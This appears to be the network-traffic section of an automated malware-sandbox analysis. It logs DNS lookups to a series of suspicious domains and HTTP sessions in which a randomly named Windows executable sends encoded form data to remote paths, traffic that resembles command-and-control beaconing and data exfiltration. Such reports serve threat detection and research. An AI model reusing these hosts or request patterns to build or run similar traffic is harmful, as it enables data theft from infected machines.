                    Aug 12, 2024 05:16:39.948304892 CEST4977780192.168.2.4104.21.45.56
                    Aug 12, 2024 05:16:40.957024097 CEST4977880192.168.2.4104.21.45.56
                    Aug 12, 2024 05:16:40.962505102 CEST8049778104.21.45.56192.168.2.4
                    Aug 12, 2024 05:16:40.962657928 CEST4977880192.168.2.4104.21.45.56
                    Aug 12, 2024 05:16:40.965296984 CEST4977880192.168.2.4104.21.45.56
                    Aug 12, 2024 05:16:40.970933914 CEST8049778104.21.45.56192.168.2.4
                    Aug 12, 2024 05:16:40.970972061 CEST8049778104.21.45.56192.168.2.4
                    Aug 12, 2024 05:16:40.970999956 CEST8049778104.21.45.56192.168.2.4
                    Aug 12, 2024 05:16:40.971025944 CEST8049778104.21.45.56192.168.2.4
                    Aug 12, 2024 05:16:40.971051931 CEST8049778104.21.45.56192.168.2.4
                    Aug 12, 2024 05:16:40.971079111 CEST8049778104.21.45.56192.168.2.4
                    Aug 12, 2024 05:16:40.971105099 CEST8049778104.21.45.56192.168.2.4
                    Aug 12, 2024 05:16:40.971132040 CEST8049778104.21.45.56192.168.2.4
                    Aug 12, 2024 05:16:40.971234083 CEST8049778104.21.45.56192.168.2.4
                    Aug 12, 2024 05:16:42.469573021 CEST4977880192.168.2.4104.21.45.56
                    Aug 12, 2024 05:16:42.475348949 CEST8049778104.21.45.56192.168.2.4
                    Aug 12, 2024 05:16:42.479104996 CEST4977880192.168.2.4104.21.45.56
                    Aug 12, 2024 05:16:43.487526894 CEST4977980192.168.2.4104.21.45.56
                    Aug 12, 2024 05:16:43.507030010 CEST8049779104.21.45.56192.168.2.4
                    Aug 12, 2024 05:16:43.507114887 CEST4977980192.168.2.4104.21.45.56
                    Aug 12, 2024 05:16:43.509048939 CEST4977980192.168.2.4104.21.45.56
                    Aug 12, 2024 05:16:43.514334917 CEST8049779104.21.45.56192.168.2.4
                    TimestampSource PortDest PortSource IPDest IP
                    Aug 12, 2024 05:13:30.278496981 CEST5907253192.168.2.41.1.1.1
                    Aug 12, 2024 05:13:30.316458941 CEST53590721.1.1.1192.168.2.4
                    Aug 12, 2024 05:13:46.050177097 CEST5128453192.168.2.41.1.1.1
                    Aug 12, 2024 05:13:46.315876961 CEST53512841.1.1.1192.168.2.4
                    Aug 12, 2024 05:13:59.627396107 CEST6192553192.168.2.41.1.1.1
                    Aug 12, 2024 05:13:59.636177063 CEST53619251.1.1.1192.168.2.4
                    Aug 12, 2024 05:14:07.696597099 CEST6082153192.168.2.41.1.1.1
                    Aug 12, 2024 05:14:07.716068029 CEST53608211.1.1.1192.168.2.4
                    Aug 12, 2024 05:14:15.788949966 CEST5608953192.168.2.41.1.1.1
                    Aug 12, 2024 05:14:16.202466011 CEST53560891.1.1.1192.168.2.4
                    Aug 12, 2024 05:14:30.301140070 CEST5587453192.168.2.41.1.1.1
                    Aug 12, 2024 05:14:31.312119961 CEST5587453192.168.2.41.1.1.1
                    Aug 12, 2024 05:14:31.357090950 CEST53558741.1.1.1192.168.2.4
                    Aug 12, 2024 05:14:31.357131958 CEST53558741.1.1.1192.168.2.4
                    Aug 12, 2024 05:14:39.427066088 CEST6213553192.168.2.41.1.1.1
                    Aug 12, 2024 05:14:40.226320028 CEST53621351.1.1.1192.168.2.4
                    Aug 12, 2024 05:14:53.721364975 CEST5903853192.168.2.41.1.1.1
                    Aug 12, 2024 05:14:53.801259995 CEST53590381.1.1.1192.168.2.4
                    Aug 12, 2024 05:15:07.097258091 CEST6404953192.168.2.41.1.1.1
                    Aug 12, 2024 05:15:07.675668955 CEST53640491.1.1.1192.168.2.4
                    Aug 12, 2024 05:15:41.658531904 CEST5085153192.168.2.41.1.1.1
                    Aug 12, 2024 05:15:41.683772087 CEST53508511.1.1.1192.168.2.4
                    Aug 12, 2024 05:15:55.004010916 CEST5665153192.168.2.41.1.1.1
                    Aug 12, 2024 05:15:55.407530069 CEST53566511.1.1.1192.168.2.4
                    Aug 12, 2024 05:16:09.096802950 CEST6306653192.168.2.41.1.1.1
                    Aug 12, 2024 05:16:09.133132935 CEST53630661.1.1.1192.168.2.4
                    Aug 12, 2024 05:16:22.414927006 CEST5321753192.168.2.41.1.1.1
                    Aug 12, 2024 05:16:22.505395889 CEST53532171.1.1.1192.168.2.4
                    Aug 12, 2024 05:16:35.847002029 CEST4919953192.168.2.41.1.1.1
                    Aug 12, 2024 05:16:35.859514952 CEST53491991.1.1.1192.168.2.4
                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                    Aug 12, 2024 05:13:30.278496981 CEST192.168.2.41.1.1.10xa177Standard query (0)www.hprlz.czA (IP address)IN (0x0001)false
                    Aug 12, 2024 05:13:46.050177097 CEST192.168.2.41.1.1.10xc19eStandard query (0)www.catherineviskadi.comA (IP address)IN (0x0001)false
                    Aug 12, 2024 05:13:59.627396107 CEST192.168.2.41.1.1.10x7583Standard query (0)www.hatercoin.onlineA (IP address)IN (0x0001)false
                    Aug 12, 2024 05:14:07.696597099 CEST192.168.2.41.1.1.10xd57cStandard query (0)www.fourgrouw.cfdA (IP address)IN (0x0001)false
                    Aug 12, 2024 05:14:15.788949966 CEST192.168.2.41.1.1.10x2e68Standard query (0)www.bfiworkerscomp.comA (IP address)IN (0x0001)false
                    Aug 12, 2024 05:14:30.301140070 CEST192.168.2.41.1.1.10x5cdcStandard query (0)www.tinmapco.comA (IP address)IN (0x0001)false
                    Aug 12, 2024 05:14:31.312119961 CEST192.168.2.41.1.1.10x5cdcStandard query (0)www.tinmapco.comA (IP address)IN (0x0001)false
                    Aug 12, 2024 05:14:39.427066088 CEST192.168.2.41.1.1.10x6933Standard query (0)www.xn--fhq1c541j0zr.comA (IP address)IN (0x0001)false
                    Aug 12, 2024 05:14:53.721364975 CEST192.168.2.41.1.1.10x56abStandard query (0)www.xn--matfrmn-jxa4m.seA (IP address)IN (0x0001)false
                    Aug 12, 2024 05:15:07.097258091 CEST192.168.2.41.1.1.10x39dfStandard query (0)www.anuts.topA (IP address)IN (0x0001)false
                    Aug 12, 2024 05:15:41.658531904 CEST192.168.2.41.1.1.10x5baaStandard query (0)www.telwisey.infoA (IP address)IN (0x0001)false
                    Aug 12, 2024 05:15:55.004010916 CEST192.168.2.41.1.1.10xc591Standard query (0)www.sandranoll.comA (IP address)IN (0x0001)false
                    Aug 12, 2024 05:16:09.096802950 CEST192.168.2.41.1.1.10xb73bStandard query (0)www.gipsytroya.comA (IP address)IN (0x0001)false
                    Aug 12, 2024 05:16:22.414927006 CEST192.168.2.41.1.1.10xc861Standard query (0)www.helpers-lion.onlineA (IP address)IN (0x0001)false
                    Aug 12, 2024 05:16:35.847002029 CEST192.168.2.41.1.1.10x948fStandard query (0)www.dmtxwuatbz.ccA (IP address)IN (0x0001)false
                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                    Aug 12, 2024 05:13:30.316458941 CEST1.1.1.1192.168.2.40xa177No error (0)www.hprlz.cz5.44.111.162A (IP address)IN (0x0001)false
                    Aug 12, 2024 05:13:46.315876961 CEST1.1.1.1192.168.2.40xc19eNo error (0)www.catherineviskadi.com217.160.0.106A (IP address)IN (0x0001)false
                    Aug 12, 2024 05:13:59.636177063 CEST1.1.1.1192.168.2.40x7583Name error (3)www.hatercoin.onlinenonenoneA (IP address)IN (0x0001)false
                    Aug 12, 2024 05:14:07.716068029 CEST1.1.1.1192.168.2.40xd57cName error (3)www.fourgrouw.cfdnonenoneA (IP address)IN (0x0001)false
                    Aug 12, 2024 05:14:16.202466011 CEST1.1.1.1192.168.2.40x2e68No error (0)www.bfiworkerscomp.com208.91.197.27A (IP address)IN (0x0001)false
                    Aug 12, 2024 05:14:31.357090950 CEST1.1.1.1192.168.2.40x5cdcName error (3)www.tinmapco.comnonenoneA (IP address)IN (0x0001)false
                    Aug 12, 2024 05:14:31.357131958 CEST1.1.1.1192.168.2.40x5cdcName error (3)www.tinmapco.comnonenoneA (IP address)IN (0x0001)false
                    Aug 12, 2024 05:14:40.226320028 CEST1.1.1.1192.168.2.40x6933No error (0)www.xn--fhq1c541j0zr.com43.252.167.188A (IP address)IN (0x0001)false
                    Aug 12, 2024 05:14:53.801259995 CEST1.1.1.1192.168.2.40x56abNo error (0)www.xn--matfrmn-jxa4m.se194.9.94.85A (IP address)IN (0x0001)false
                    Aug 12, 2024 05:14:53.801259995 CEST1.1.1.1192.168.2.40x56abNo error (0)www.xn--matfrmn-jxa4m.se194.9.94.86A (IP address)IN (0x0001)false
                    Aug 12, 2024 05:15:07.675668955 CEST1.1.1.1192.168.2.40x39dfNo error (0)www.anuts.top23.251.54.212A (IP address)IN (0x0001)false
                    Aug 12, 2024 05:15:41.683772087 CEST1.1.1.1192.168.2.40x5baaNo error (0)www.telwisey.info199.192.19.19A (IP address)IN (0x0001)false
                    Aug 12, 2024 05:15:55.407530069 CEST1.1.1.1192.168.2.40xc591No error (0)www.sandranoll.com213.145.228.16A (IP address)IN (0x0001)false
                    Aug 12, 2024 05:16:09.133132935 CEST1.1.1.1192.168.2.40xb73bNo error (0)www.gipsytroya.comparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)false
                    Aug 12, 2024 05:16:09.133132935 CEST1.1.1.1192.168.2.40xb73bNo error (0)parkingpage.namecheap.com91.195.240.19A (IP address)IN (0x0001)false
                    Aug 12, 2024 05:16:22.505395889 CEST1.1.1.1192.168.2.40xc861No error (0)www.helpers-lion.online194.58.112.174A (IP address)IN (0x0001)false
                    Aug 12, 2024 05:16:35.859514952 CEST1.1.1.1192.168.2.40x948fNo error (0)www.dmtxwuatbz.cc104.21.45.56A (IP address)IN (0x0001)false
                    Aug 12, 2024 05:16:35.859514952 CEST1.1.1.1192.168.2.40x948fNo error (0)www.dmtxwuatbz.cc172.67.210.102A (IP address)IN (0x0001)false
                    • www.hprlz.cz
                    • www.catherineviskadi.com
                    • www.bfiworkerscomp.com
                    • www.xn--fhq1c541j0zr.com
                    • www.xn--matfrmn-jxa4m.se
                    • www.anuts.top
                    • www.telwisey.info
                    • www.sandranoll.com
                    • www.gipsytroya.com
                    • www.helpers-lion.online
                    • www.dmtxwuatbz.cc
                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    0192.168.2.4497385.44.111.162802008C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe
                    TimestampBytes transferredDirectionData
                    Aug 12, 2024 05:13:30.329245090 CEST496OUTGET /w6qg/?ZH3=yf1H3v6h&YXDT=0lpTRQcDUH+iEsGyb7K93jJ3AkchBc2e7Z/xuNmTgdli9rpOUGyXizj5cQ9XxC4so84FNpFR9txXxm0tq1CayhJ+NIkCDL9/8P53q6zBNKDHtjSuHiPb7bo= HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Language: en-us
                    Host: www.hprlz.cz
                    Connection: close
                    User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                    Aug 12, 2024 05:13:30.987478018 CEST725INHTTP/1.1 301 Moved Permanently
                    Server: nginx
                    Date: Mon, 12 Aug 2024 03:13:30 GMT
                    Content-Type: text/html; charset=iso-8859-1
                    Content-Length: 377
                    Connection: close
                    Location: https://www.hprlz.cz/w6qg/?ZH3=yf1H3v6h&YXDT=0lpTRQcDUH+iEsGyb7K93jJ3AkchBc2e7Z/xuNmTgdli9rpOUGyXizj5cQ9XxC4so84FNpFR9txXxm0tq1CayhJ+NIkCDL9/8P53q6zBNKDHtjSuHiPb7bo=
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 70 72 6c 7a 2e 63 7a 2f 77 36 71 67 2f 3f 5a 48 33 3d 79 66 31 48 33 76 36 68 26 61 6d 70 3b 59 58 44 54 3d 30 6c 70 54 52 51 63 44 55 48 2b 69 45 73 47 79 62 37 4b 39 33 6a 4a 33 41 6b 63 68 42 63 32 65 37 5a 2f 78 75 4e 6d 54 67 64 6c 69 39 72 70 4f 55 47 79 58 69 7a 6a 35 63 51 39 58 78 43 34 73 6f 38 34 46 4e 70 46 52 39 74 78 58 78 6d 30 74 71 31 43 61 79 68 4a 2b 4e 49 6b 43 44 4c 39 2f 38 50 35 33 71 36 7a 42 4e 4b 44 48 74 6a 53 75 [TRUNCATED]
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.hprlz.cz/w6qg/?ZH3=yf1H3v6h&amp;YXDT=0lpTRQcDUH+iEsGyb7K93jJ3AkchBc2e7Z/xuNmTgdli9rpOUGyXizj5cQ9XxC4so84FNpFR9txXxm0tq1CayhJ+NIkCDL9/8P53q6zBNKDHtjSuHiPb7bo=">here</a>.</p></body></html>


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    1192.168.2.449739217.160.0.106802008C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe
                    TimestampBytes transferredDirectionData
                    Aug 12, 2024 05:13:46.325484991 CEST792OUTPOST /qe66/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Language: en-us
                    Accept-Encoding: gzip, deflate, br
                    Host: www.catherineviskadi.com
                    Origin: http://www.catherineviskadi.com
                    Cache-Control: max-age=0
                    Connection: close
                    Content-Type: application/x-www-form-urlencoded
                    Content-Length: 201
                    Referer: http://www.catherineviskadi.com/qe66/
                    User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                    Data Raw: 59 58 44 54 3d 51 6c 48 72 66 70 53 50 44 67 78 66 5a 61 63 2b 51 6c 4e 41 73 53 42 46 62 6e 77 79 33 61 2b 72 64 6c 56 6d 4d 4e 6b 2b 49 4c 37 5a 59 72 47 4d 46 70 61 4c 66 35 6f 76 69 35 4c 39 78 6f 56 57 4f 43 42 46 78 67 58 30 61 6d 6f 4f 34 53 4c 4e 42 54 7a 6f 6f 67 61 42 6a 62 71 48 52 2b 64 78 37 67 4a 62 61 31 71 68 6a 75 57 6d 54 6f 68 6f 6b 54 4f 4e 33 6a 7a 34 4d 74 44 52 37 4b 31 73 77 67 44 6b 79 37 66 4c 71 67 65 56 52 48 69 38 6a 47 37 78 31 79 48 35 32 6f 75 51 55 4c 6e 52 37 55 78 6c 46 66 58 56 4f 54 51 50 44 66 58 7a 61 2b 36 4f 5a 53 54 41 44 36 6b 79 56 41 65 71 65 51 3d 3d
                    Data Ascii: YXDT=QlHrfpSPDgxfZac+QlNAsSBFbnwy3a+rdlVmMNk+IL7ZYrGMFpaLf5ovi5L9xoVWOCBFxgX0amoO4SLNBTzoogaBjbqHR+dx7gJba1qhjuWmTohokTON3jz4MtDR7K1swgDky7fLqgeVRHi8jG7x1yH52ouQULnR7UxlFfXVOTQPDfXza+6OZSTAD6kyVAeqeQ==
                    Aug 12, 2024 05:13:46.967302084 CEST580INHTTP/1.1 404 Not Found
                    Content-Type: text/html
                    Transfer-Encoding: chunked
                    Connection: close
                    Date: Mon, 12 Aug 2024 03:13:46 GMT
                    Server: Apache
                    Content-Encoding: gzip
                    Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 [TRUNCATED]
                    Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    2192.168.2.449740217.160.0.106802008C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe
                    TimestampBytes transferredDirectionData
                    Aug 12, 2024 05:13:48.856378078 CEST812OUTPOST /qe66/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Language: en-us
                    Accept-Encoding: gzip, deflate, br
                    Host: www.catherineviskadi.com
                    Origin: http://www.catherineviskadi.com
                    Cache-Control: max-age=0
                    Connection: close
                    Content-Type: application/x-www-form-urlencoded
                    Content-Length: 221
                    Referer: http://www.catherineviskadi.com/qe66/
                    User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                    Data Raw: 59 58 44 54 3d 51 6c 48 72 66 70 53 50 44 67 78 66 44 2f 55 2b 54 47 6c 41 35 43 42 43 48 33 77 79 2b 36 2b 56 64 6c 5a 6d 4d 4d 67 75 4c 34 66 5a 59 4c 32 4d 45 6f 61 4c 63 35 6f 76 70 5a 4c 38 31 6f 56 6e 4f 43 4e 72 78 69 44 30 61 6d 73 4f 34 54 37 4e 42 45 6e 72 72 51 61 44 6f 37 71 46 4d 75 64 78 37 67 4a 62 61 31 75 50 6a 76 2b 6d 51 59 52 6f 6c 79 4f 43 72 54 7a 2f 45 4e 44 52 32 71 31 6f 77 67 44 4b 79 2b 47 75 71 6d 43 56 52 48 53 38 67 54 58 79 38 79 48 37 35 49 76 45 46 71 4b 42 69 46 30 6c 4b 50 44 5a 41 54 45 7a 4c 35 47 70 4c 50 62 5a 4c 53 33 7a 65 39 74 47 59 44 6a 6a 46 61 58 6c 73 79 65 52 6e 4b 2f 32 4a 59 4e 52 32 45 4b 6a 79 72 51 3d
                    Data Ascii: YXDT=QlHrfpSPDgxfD/U+TGlA5CBCH3wy+6+VdlZmMMguL4fZYL2MEoaLc5ovpZL81oVnOCNrxiD0amsO4T7NBEnrrQaDo7qFMudx7gJba1uPjv+mQYRolyOCrTz/ENDR2q1owgDKy+GuqmCVRHS8gTXy8yH75IvEFqKBiF0lKPDZATEzL5GpLPbZLS3ze9tGYDjjFaXlsyeRnK/2JYNR2EKjyrQ=
                    Aug 12, 2024 05:13:49.493937016 CEST580INHTTP/1.1 404 Not Found
                    Content-Type: text/html
                    Transfer-Encoding: chunked
                    Connection: close
                    Date: Mon, 12 Aug 2024 03:13:49 GMT
                    Server: Apache
                    Content-Encoding: gzip
                    Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 [TRUNCATED]
                    Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    3192.168.2.449741217.160.0.106802008C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe
                    TimestampBytes transferredDirectionData
                    Aug 12, 2024 05:13:51.388668060 CEST10894OUTPOST /qe66/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Language: en-us
                    Accept-Encoding: gzip, deflate, br
                    Host: www.catherineviskadi.com
                    Origin: http://www.catherineviskadi.com
                    Cache-Control: max-age=0
                    Connection: close
                    Content-Type: application/x-www-form-urlencoded
                    Content-Length: 10301
                    Referer: http://www.catherineviskadi.com/qe66/
                    User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                    Data Raw: 59 58 44 54 3d 51 6c 48 72 66 70 53 50 44 67 78 66 44 2f 55 2b 54 47 6c 41 35 43 42 43 48 33 77 79 2b 36 2b 56 64 6c 5a 6d 4d 4d 67 75 4c 34 58 5a 59 36 57 4d 45 4c 43 4c 64 35 6f 76 6b 35 4c 68 31 6f 56 41 4f 43 46 76 78 69 50 6b 61 67 77 4f 35 78 7a 4e 52 67 4c 72 38 41 61 44 6e 62 71 49 52 2b 63 7a 37 67 5a 66 61 31 2b 50 6a 76 2b 6d 51 61 4a 6f 6c 6a 4f 43 70 54 7a 34 4d 74 44 4e 37 4b 31 41 77 67 37 38 79 36 62 62 72 51 79 56 53 6e 43 38 77 78 50 79 2b 53 48 44 34 49 76 4d 46 71 48 62 69 42 55 54 4b 50 32 32 41 52 59 7a 50 76 48 41 59 63 66 65 63 78 6d 31 41 66 63 69 63 43 58 69 42 4b 54 67 6f 6a 47 36 31 4f 33 43 54 4b 63 4e 69 46 57 38 70 38 63 4e 69 50 53 38 2f 70 6c 66 55 44 56 69 4a 4a 57 52 4e 65 5a 4a 34 68 2b 43 4d 56 4c 32 47 6b 76 57 62 75 51 57 34 68 7a 72 48 44 4b 50 52 47 7a 71 2b 4e 7a 78 4d 65 59 6d 66 73 64 36 36 49 5a 2b 4a 74 64 42 66 4a 57 7a 7a 72 43 4d 63 32 49 67 6c 49 41 59 44 4c 75 4e 69 4c 69 73 47 39 36 72 77 55 69 4b 31 4f 31 4e 64 72 2b 5a 54 56 65 54 41 6b 70 73 79 [TRUNCATED]
                    Data Ascii: YXDT=QlHrfpSPDgxfD/U+TGlA5CBCH3wy+6+VdlZmMMguL4XZY6WMELCLd5ovk5Lh1oVAOCFvxiPkagwO5xzNRgLr8AaDnbqIR+cz7gZfa1+Pjv+mQaJoljOCpTz4MtDN7K1Awg78y6bbrQyVSnC8wxPy+SHD4IvMFqHbiBUTKP22ARYzPvHAYcfecxm1AfcicCXiBKTgojG61O3CTKcNiFW8p8cNiPS8/plfUDViJJWRNeZJ4h+CMVL2GkvWbuQW4hzrHDKPRGzq+NzxMeYmfsd66IZ+JtdBfJWzzrCMc2IglIAYDLuNiLisG96rwUiK1O1Ndr+ZTVeTAkpsy8N3Z8rD7lcRSzFx9wsgGZssteRr2+8wfmeLQSVInd316fCKzj7ZSx/MmL+7KZAmKuxbX20KqC/UrgjH2QGd49+SJkZtMsCBBlTJxxTR+ss3NtZykLjFEsi6uwKYZm0dPAafUC0eaMjNQzm1xGSoexdOfMVPEplukhxL8jQfFwq6HLfN4iKqJLBlJ77jT0CfOGg8TyycBrggKLk5fY4H724rheygicyuNu9NZVhhWHJZPaKnhHjblfqtQHU76541+e2mV4Xb8NjPIz13kR326M1Rd7kxETl8/axlmDwzkaXnAHYn12oplx7T7vCyxn1sml0cpymgZNGoGvppoYnwLLdmDsQrBhmNAmT+Wo3UzCj8RqWqKE2bg8He7//XPGX4vohdc3ki0XAOJKor4YZrrM4byjsyu1AcU48YJhr33J1vyBq+qz/t0DUXYoXhsZT1+Qu2RLXUQXmoNtfzC8qGGlK/3XRAG31vei16Bil4l3fNfR79BC7Zv/Wk3X6aX5dosNc1hTfAzloltqF7T6tM8Xnr/KGTZ0DPzjfKttuaOGOaWy0tKZy/TLLQA2baUY/e7jYIj4ostkFyMi+lxa0+LOmSZ4x+rwS9hmDaCnNUMaRXwCpU/QyxxFkyhYXDdkvxMCIhO4+wLmd6eYe4BYQuRXS26NQcWO2w9od [TRUNCATED]
                    Aug 12, 2024 05:13:52.142559052 CEST580INHTTP/1.1 404 Not Found
                    Content-Type: text/html
                    Transfer-Encoding: chunked
                    Connection: close
                    Date: Mon, 12 Aug 2024 03:13:51 GMT
                    Server: Apache
                    Content-Encoding: gzip
                    Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d 